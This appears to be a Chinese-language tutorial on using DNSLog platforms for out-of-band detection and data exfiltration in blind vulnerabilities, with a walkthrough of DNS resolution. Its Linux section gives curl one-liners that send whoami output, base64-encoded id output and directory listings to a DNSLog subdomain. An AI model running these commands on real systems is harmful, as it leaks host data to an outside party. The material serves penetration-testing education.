DNSLog漏洞

DNSLog漏洞

DNS（Domain Name System）是一个用于将域名转换为与之对应的 IP 地址的分布式命名系统。

DNS日志是记录特定设备或网络发出的所有DNS查询的记录。这些日志可用于排除DNS问题、监控网络活动和分析流量模式。DNS日志通常包括信息，如源IP地址、查询的域名、查询类型（如A记录、MX记录）以及从DNS服务器接收到的响应。

没有回显的情况下怎么办？

利用限制

1、域名层级：一般不超过5级
2、每级域名最大长度：63个ASCII字符
3、总域名长度：253个ASCII字符
4、内容限制：数字、字母、下划线
5、适用漏洞：RCE、XXE、SSRF、SQL注入、JNDI注入、反序列化等

http://dnslog.cn

利用DNSLog服务中的漏洞进行数据窃取攻击。攻击者可以通过在受害者系统上植入恶意代码，使其发送DNS请求到恶意控制的DNSLog服务器。当受害者系统发送DNS请求时，恶意控制的DNSLog服务器会记录请求中的敏感信息，如用户凭证、用户访问的网站等。攻击者可以通过分析DNSLog服务器上的日志来获取这些敏感信息，从而实现数据窃取。

DNS解析流程

用户在浏览器中输入一个域名，比如www.example.com。
操作系统首先检查本地的DNS缓存，看是否已经保存了这个域名对应的IP地址。如果有，就直接返回IP地址，跳过后续步骤。
如果本地缓存中没有找到对应的IP地址，操作系统会向本地的DNS解析器发起查询请求。
本地DNS解析器首先查询自己的缓存，看是否已经保存了这个域名对应的IP地址。如果有，就直接返回IP地址，跳过后续步骤。
如果本地DNS解析器的缓存中没有找到对应的IP地址，它会向根域名服务器发送查询请求。
根域名服务器收到查询请求后，会返回一个指向负责顶级域名（如.com、.net等）的服务器的IP地址。
本地DNS解析器收到根域名服务器返回的IP地址后，会向负责顶级域名的服务器发送查询请求。
负责顶级域名的服务器收到查询请求后，会返回一个指向负责二级域名（如example.com）的服务器的IP地址。
本地DNS解析器收到负责二级域名的服务器返回的IP地址后，会向该服务器发送查询请求。
负责二级域名的服务器收到查询请求后，会返回该域名对应的IP地址给本地DNS解析器。
本地DNS解析器将收到的IP地址返回给操作系统，并将其保存在缓存中。
操作系统收到IP地址后，将其返回给浏览器，浏览器就可以向该IP地址发送请求，访问相应的网站

1、hosts文件（C:\Windows\System32\drivers\etc\hosts）
2、DNS缓存（ipconfig /displaydns）
3、本地DNS服务器（路由器自身，转发给上层）
4、根DNS服务器（Root Server）,13组集群服务器
5、顶级域名DNS服务器（Top Level Domain Server），如.com、.cn、.org等
6、Name Server域名服务器的地址（域名服务商提供）

常见DNSLog平台

Burp Collaborator

dnslong.cn

Windows环境变量大全
https://www.cnblogs.com/xs-xs/p/17156091.html

Linux下DNSLog利用
获取变量值：
curl http://`whoami`.xxxxxx.dnslog.cn/
base64编码输出：
curl http://$(id|base64).xxxxxx.dnslog.cn/
循环获取文件输出：
for i in $(ls /);do curl "http://$i.xxxxxx.dnslog.cn/";done;

c e y e . i o

1、固定子域名，不会变动
2、解析记录在账号下保存
3、提供在线API

漏洞利用

c e y e . i o

1、固定子域名，不会变动
2、解析记录在账号下保存
3、提供在线API

漏洞利用

只要有解析记录，就证明漏洞存在